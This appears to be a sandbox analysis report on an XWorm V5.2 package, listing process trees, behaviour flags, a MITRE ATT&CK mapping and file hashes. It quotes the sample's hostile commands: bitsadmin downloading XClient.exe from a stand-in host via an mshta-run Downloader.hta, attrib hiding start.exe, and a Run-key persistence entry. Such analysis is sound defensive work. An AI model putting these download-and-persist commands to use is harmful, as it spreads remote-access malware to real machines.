- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,14347994709960295445,15543057053867516141,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
    3⤵
    PID:3052
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,14347994709960295445,15543057053867516141,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
    3⤵
    PID:4092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/XCoderTools
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:3380
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabc4546f8,0x7ffabc454708,0x7ffabc454718
    3⤵
    PID:5336
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,12903039911462868948,3892176295294968101,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
    3⤵
    PID:680
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,12903039911462868948,3892176295294968101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,12903039911462868948,3892176295294968101,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
    3⤵
    PID:2840
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12903039911462868948,3892176295294968101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
    3⤵
    PID:860
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12903039911462868948,3892176295294968101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
    3⤵
    PID:2800
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12903039911462868948,3892176295294968101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
    3⤵
    PID:1832
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,12903039911462868948,3892176295294968101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:8
    3⤵
    PID:5996
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,12903039911462868948,3892176295294968101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:516

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:376

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1996

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3696

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\XWorm V5.2\start.bat" "
1⤵
PID:2828
- C:\Users\Admin\Downloads\XWorm V5.2\start.exe
  start.exe
  2⤵
  - Adds Run key to start application
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4976
- - C:\Windows\system32\attrib.exe
    attrib +h +s "C:\Users\Admin\Downloads\XWorm V5.2\start.exe"
    3⤵
    - Views/modifies file attributes
    PID:5216
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:3640

C:\Users\Admin\Downloads\XWorm V5.2\XWormLoader 5.2 x64.exe
"C:\Users\Admin\Downloads\XWorm V5.2\XWormLoader 5.2 x64.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4860

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4992

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1084
- C:\Windows\SysWOW64\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\ProgramData\file.exe
  2⤵
  - Download via BitsAdmin
  - System Location Discovery: System Language Discovery
  PID:2556

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\XWorm V5.2\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5788
- C:\Windows\SysWOW64\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\ProgramData\file.exe
  2⤵
  - Download via BitsAdmin
  - System Location Discovery: System Language Discovery
  PID:3488

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\XWorm V5.2\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3512
- C:\Windows\SysWOW64\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\ProgramData\file.exe
  2⤵
  - Download via BitsAdmin
  - System Location Discovery: System Language Discovery
  PID:2532

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\b443ce1ebb654a05a605245423706b2e /t 5912 /p 3512
1⤵
PID:8

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\XWorm V5.2\Fixer.bat" "
1⤵
PID:5228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\XWorm V5.2\Fixer.bat"
1⤵
PID:2052

C:\Users\Admin\Downloads\XWorm V5.2\XWormLoader 5.2 x32.exe
"C:\Users\Admin\Downloads\XWorm V5.2\XWormLoader 5.2 x32.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4932

C:\Users\Admin\Downloads\XWorm V5.2\XWorm V5.2.exe
"C:\Users\Admin\Downloads\XWorm V5.2\XWorm V5.2.exe"
1⤵
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4836

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4972

C:\Users\Admin\Downloads\XWorm V5.2\XWorm V5.2.exe
"C:\Users\Admin\Downloads\XWorm V5.2\XWorm V5.2.exe"
1⤵
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/XCoderTools
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:5968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabc4546f8,0x7ffabc454708,0x7ffabc454718
    3⤵
    PID:5280
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,14989336044394220620,11018988605076803667,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
    3⤵
    PID:5480
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,14989336044394220620,11018988605076803667,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
    3⤵
    PID:5796
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,14989336044394220620,11018988605076803667,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2972 /prefetch:8
    3⤵
    PID:2424
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,14989336044394220620,11018988605076803667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2204 /prefetch:1
    3⤵
    PID:3344
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,14989336044394220620,11018988605076803667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
    3⤵
    PID:3024
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,14989336044394220620,11018988605076803667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
    3⤵
    PID:5040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/XCoderTools
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:5012
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffabc4546f8,0x7ffabc454708,0x7ffabc454718
    3⤵
    PID:5236
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,9942574147631392566,2808126718467055230,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
    3⤵
    PID:6048
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,9942574147631392566,2808126718467055230,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
    3⤵
    PID:5888
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,9942574147631392566,2808126718467055230,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3060 /prefetch:8
    3⤵
    PID:5628
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9942574147631392566,2808126718467055230,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
    3⤵
    PID:1148
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9942574147631392566,2808126718467055230,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
    3⤵
    PID:4976
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,9942574147631392566,2808126718467055230,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
    3⤵
    PID:2404
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,9942574147631392566,2808126718467055230,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 /prefetch:8
    3⤵
    PID:3648
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,9942574147631392566,2808126718467055230,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 /prefetch:8
    3⤵
    PID:3420

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1008

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3264

C:\Users\Admin\Downloads\XWorm V5.2\XWormLoader 5.2 x64.exe
"C:\Users\Admin\Downloads\XWorm V5.2\XWormLoader 5.2 x64.exe"
1⤵
- Executes dropped EXE
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1140

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4032

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3036

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2176

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\XWorm V5.2\ClientsFolder\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3540
- C:\Windows\SysWOW64\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
  2⤵
  - Download via BitsAdmin
  - System Location Discovery: System Language Discovery
  PID:3436

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\608a5e3e0c28426bb56cc7ed6a514ffa /t 5192 /p 3540
1⤵
PID:724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

BITS Jobs

T1197

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
61cef8e38cd95bf003f5fdd1dc37dae1

SHA1
11f2f79ecb349344c143eea9a0fed41891a3467f

SHA256
ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e

SHA512
6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0a9dc42e4013fc47438e96d24beb8eff

SHA1
806ab26d7eae031a58484188a7eb1adab06457fc

SHA256
58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151

SHA512
868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7be399ed0d0992d4882f12e836020f5f

SHA1
ee28dcba32138f9d9eb97f0e1f8258bbe1f58bb7

SHA256
81b3a488d55bcff7c32af744b38e95f2af8386452d3198ea0086f4506b0f9c8c

SHA512
e13ee1dca6107597f8985da78200c322242c63c45447d4596b335044b0d75929c9ae0ec415b10161b975802db9bc58f6857d8dc1318caffc073e146150cbf38c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ec8062f35121259b5a592dadec26b3d7

SHA1
2825f10672be5fbbd569b8230a13963ddee14464

SHA256
532daa0f7b60d2721a3fa252d9c88017a8415e44394db2c5d931a56c4f980fcd

SHA512
63c44005f139ffd2c60f5c0b7a5abda0a496d93b9dde82cc72786ee139c83581960805c98bc06727b9a987f736efb1e5aa550a68d40843c05138a9b48af0225b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
dbd8cb82f9ff97d939c620c82e2df661

SHA1
f3e004cfa2639f29357c9b33b358e10fb6d70623

SHA256
2a3301c2a18cb617a0f1297a269f00d6fdee038f910529b0e46061767bce1b8d

SHA512
4188ae4895f9aa7804a37858f745a93bea998c0affaaec4893da78bebe90fd35e7871a2f5d4f8fad55621b07a1f7b90ee99f50b7dfef6c4b7fc8a3f22d24bd73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d24c9db85ce931b28908c0b2afaf9b1f

SHA1
113e1c7f5ee3071bb2c4268e5ca2bb7cc5474e49

SHA256
e71ffdd08f95aa8a8df08b525c03e3b8ef963f8ff6f8344b03550fe04eb2ead6

SHA512
012c1fe0662283e46c4ad2c90d90592f38418eef6c6f7e34fd147ec6bce8bc2d7756d21f757c2c7396d1aba410769bf8b83c65049a41632f4a53e61dc2b79b13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
238fe971bea3a60534fd942bd6330802

SHA1
21a9a95dcd8d4515f91adb797fc9f73208f217f1

SHA256
605745a5af3d0b41af77ea63a2c74e814a5fec008595f310424cceecb47f8828

SHA512
1eb489017e354ca62f5d21f973e0e58c6cbd87976c2af6fb2d930e716e3947b678019af2156ad859958cecdb6cd76393b62abdd6e49c28e4d0878274b6edfb15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0b7b80fd4a5a30a865ae3ab295c10463

SHA1
a2fdf58254be3a96d4227d4043f82ce18d7a1c6b

SHA256
bc01548cddcf2c7c55afbd6afd85ca13ce64d58571169bfb1c72c6b25faafc14

SHA512
50341441dbd835ab993372efd3195d2d364e2b54e9f74cb6e5c383b443a74b663b91172fcfb45f6d449c7c7f164322c98f1dcf1de0acf2800a4b7fdbb58765e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f7912cc981b0776ff313987975dcb6ff

SHA1
35c51430efd64b7d8ffd33b0708c677ee2cf327f

SHA256
f5e0204fcced6f86dc186426420b4983de5172031041afb0b2a6a339f6b37cc5

SHA512
10a5f4a00dedce750ab99b04dffdc42e814c31cb572c78e93ba0bf8542251755ac4f0fffa0de86909514434d95622b86fd99d74af2df2d292ee0439cda26651b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6bfdac96a2c2c571e755f2b7e0e28bee

SHA1
67d78b2ffc406a7dc19732822da64d766eb2cebc

SHA256
ef41ca9234f5b58e1a05a35b00108f1c60d3a076fbb99d6713e17335acea2114

SHA512
969e6c7f3d34bd20967f682a61aec0ad6693fd8e24ba0a081e2ef94f3792309f87affb997a89135a77b9dcb6144acc349dcf2b25797b7eb34e63775a64258e09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3ead7cd2-2248-480a-80d7-6f7b47163950.tmp

Filesize
6KB

MD5
e3cad313015b4212e98f5f6f4ccb381a

SHA1
8ccc862cabdddd0f3345dea1cb56bb9633e2746f

SHA256
73a1b1472111c55955a3948942dd34b73f3d2443977e28e1d462af0ba5cfd699

SHA512
88fdbfb48a7cdc88ee14971b743e12894a26e88ad3fa0d3e8109d6c5f0a9422126d12b8f1b5c405eaee2ca8de9ca50830dec8d1e7c5da1da50b557a0f40a3935

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\48f093b6-0c65-4765-98e0-1b1adde8c641.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\78682b75-3f22-43d8-b0bd-3bc90311efa1.tmp

Filesize
6KB

MD5
d6c3f486d4815bc0e3c2a58a471d6c4e

SHA1
cba241cc468e1b5c4a880dad90978d9991504c89

SHA256
b5f2e8e9705ef42a5fcfbf827b00ec8227c28ab820588f1c8c00874bc81dd9f8

SHA512
b6a833dbbff947efbaba265e05c52965de90e935d5deceb8765a4603d1e894e084058ca1368babc8f621f7fd90b4e975faa68822209d0aef65cec7a61d5d2ce5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
4029688a93c436bff90448676af5dfb2

SHA1
3dae746c1cb3f43a4e2d4f655c9b05379a3f8b22

SHA256
8767aa4d48be6bbc345429d61e751287f54e2c4f06b694773bacf058eef2537d

SHA512
f39f236389bd7209db46fde5cd4ab6a9bda1a80689b234ada5e3f299028694bb181f6915083d08ad3fa41d2b3b0604e4c38105e0b974375e3da1e4d645c1448e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
09faa7ea88ea50c49e310ef36e6e1110

SHA1
3779d1f1aa3141ef080fb76edae5578e188a507b

SHA256
7c6bc85b97cf894d70085575ea147b4af78dddff6d90534a5cfce038b52d38a1

SHA512
